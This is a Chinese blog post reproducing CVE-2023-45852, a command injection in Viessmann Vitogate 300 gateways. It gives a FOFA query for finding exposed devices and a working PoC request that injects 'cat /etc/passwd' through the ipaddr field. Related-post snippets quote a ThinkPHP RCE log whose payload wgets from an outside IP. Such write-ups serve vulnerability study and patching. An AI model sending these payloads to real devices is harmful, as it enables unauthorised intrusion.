Viessmann Vitogate RCE 漏洞(含批量验证poc)

已于 2024-04-17 16:23:36 修改
阅读量232 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络
于 2024-04-17 16:23:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43567873/article/details/137877980
本文详细介绍了Viessmann Vitogate 300网关的安全漏洞,该漏洞允许未授权攻击者通过特制请求执行任意命令,影响版本<=2.1.3.0。复现环境为fofa:app="Vitogate-300"。修复建议包括限制接口访问权限和升级到安全版本。

产品简介

Viessmann Vitogate 300是用于将Viessmann LON连接到BACnet或Modbus的网关。

漏洞概述

Vitogate 300组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。

影响范围

version <= 2.1.3.0

复现环境

fofa:app=”Vitogate-300”

漏洞复现

PoC

POST /cgi-bin/vitogate.cgi HTTP/1.1
Host: your-ip
Content-Type: application/json

{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Viessmann Vitogate RCE漏洞复现(CVE-2023-45852)
0xSec
01-23 755
Vitogate 300 组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。
CVE-2023-45852:Viessmann Vitogate远程代码执行漏洞复现【附POC
薛定谔嘚喵博客
11-03 643
Viessmann Vitogate 300 2.1.3.0版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者绕过身份验证,并通过post方法的ipaddr参数执行任意命令。
漏洞复现-Viessmann Vitogate 远程命令执行漏洞(CVE-2023-45852)
玄道的网安博客
08-13 453
Vitogate 300 2.1.3.0版本的/cgi-bin/vitogate.cgi存在一个未经身份验证的攻击者可利用的漏洞,通过put方法中的ipaddr params JSON数据中的shell元字符实现绕过身份验证并执行任意命令。通过分析/ugw/httpd/html/cgi-bin/vitogate.cgi,它通过HTTPPOST接受JSON格式的数据。目前官方已发布新版已经修复此漏洞,并且为受影响版本发布了补丁,建议用户尽快升级至最新版本。然后isValidSession函数检查是否已登录。
漏洞复现】Viessmann Vitogate远程代码执行(CVE-2023-45852)
失心少年
11-09 619
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。Vitogate 300 2.1.3.0版本的/cgi-bin/vitogate.cgi存在一个未经身份验证的攻击者可利用的漏洞,通过put方法中的ipaddr params JSON数据中的shell元字符实现绕过身份验证并执行任意命令。
Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)
weixin_44304678的博客
11-02 675
漏洞源于允许未经身份验证的攻击者绕过身份验证,并通过put方法的ipaddr参数执行任意命令。仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。Viessmann VitogateViessmann公司的一个智能化控制系统。该文章仅用于授权测试,任何未经授权的测试均属于非法行为。### 查看用户文件。
phpstudy后门rce批量利用脚本的实现
10-15
主要介绍了phpstudy后门rce批量利用脚本的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
漏洞复现】CVE-2023-45852 Viessmann Vitogate 300命令执行漏洞
最新发布
失心少年
11-20 455
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Viessmann Vitogate 300 2.1.3.0之前版本存在命令注入漏洞,未经身份认证的攻击者可利用该漏洞绕过身份认证并通过shell元字符执行任意命令。
phpstudy后门rce批量利用脚本
weixin_30886233的博客
09-23 940
写两个一个批量检测的 一个交互式shell的 暂时py 图形化的qt写出来..有点问题 后门包 : GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0Accept:...
【Python】CVE-2017-10271批量自查POC(Weblogic RCE)
weixin_30807779的博客
12-25 467
1、说明 看到大家对weblogic漏洞这么热衷,于是也看看这个漏洞的测试方式。 找了几个安全研究员的博客分析,经过几天的摸索大体清楚漏洞由XMLDecoder的反序列化产生。 漏洞最早4月份被发现,10月份的漏洞是由于官方修复不完善导致被绕过。 嗯,又学习了很多知识。 2、批量测试脚本 # -*- coding: UTF-8 -*- import requests,sys,os h...
PHP常见后门修复,phpStudy后门RCE,复现/批量脚本/修复
weixin_33416318的博客
03-10 713
phpStudy后门介绍phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。软件作者声明:phpstudy 2016版PHP5.4存在后门。实际测试官网下载phpstudy2018版php-5.2....
php rce,批量thinkphp5的RCE漏洞利用
weixin_42160645的博客
03-18 586
蜜罐捕获攻击212.237.14.55 - - [22/Dec/2018:13:17:50 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93...
php使用eval上传文件,PHP一句话实现单个文件批量上传?
weixin_39555320的博客
03-09 760
0×00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。0×01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见的php一句话木马:当我...
Viessmann Vitogate RCE漏洞(CVE-2023-45852)
m0_64366018的博客
01-30 592
【代码】Viessmann Vitogate RCE漏洞(CVE-2023-45852)
D-LinkNAS 远程命令执行漏洞(CVE-2024-3273)RCE
wan___she__pi的博客
04-12 1295
D-LinkNAS是由D-Link公司制造的网络附加存储设备。D-Link是一家专注于网络和连接解决方案的公司。网络附加存储(NAS)设备是专用的文件存储系统,可以连接到计算机网络,允许多个用户和设备从集中位置访问和共享文件。aWQ=是id经过base64编码。
HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现
Innocence_0的博客
10-28 340
最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。
漏洞复现】某某康达vpn——list_base_config.php——命令执行
LongL_GuYu的博客
08-16 1112
声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
金蝶云星空RCE漏洞复现
热门推荐
0xSec
06-21 1万+
由于金蝶云星空数据通信默认采用的是二进制数据格式,需要进行序列化与反序列化,在此过程中未对数据进行签名或校验,导致客户端发出的数据可被攻击者恶意篡改,写入包恶意代码的序列化数据,达到在服务端远程命令执行的效果。该漏洞不仅存在于金蝶云星空管理中心(默认8000端口),普通应用(默认80端口)也存在类似问题。
小迪安全_服务攻防 数据库,中间件安全
weixin_44060420的博客
06-08 967
知识点:1、服务攻防-数据库类型安全2、Redis&Hadoop&Mysql安全3、ysq1-CVE-2012-2122漏洞4、Hadoop-配置不当未授权三重奏&RCE漏洞3、Redis-配置不当未授权三重奏&RCE漏洞#章节内容:常见服务应用的安全测试:1、配置不当-未授权访问2、安全机制-特定安全漏洞3、安全机制-弱口令爆破攻击#前置知识:应用服务安全测试流程:见图1、判断服务开放情况-端口扫描&组合应用等。
RCE代码及命令执行(详解)
剁椒鱼头没剁椒的博客
12-20 5842
借鉴链接:https://www.cnblogs.com/networkroom/p/16395024.html当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值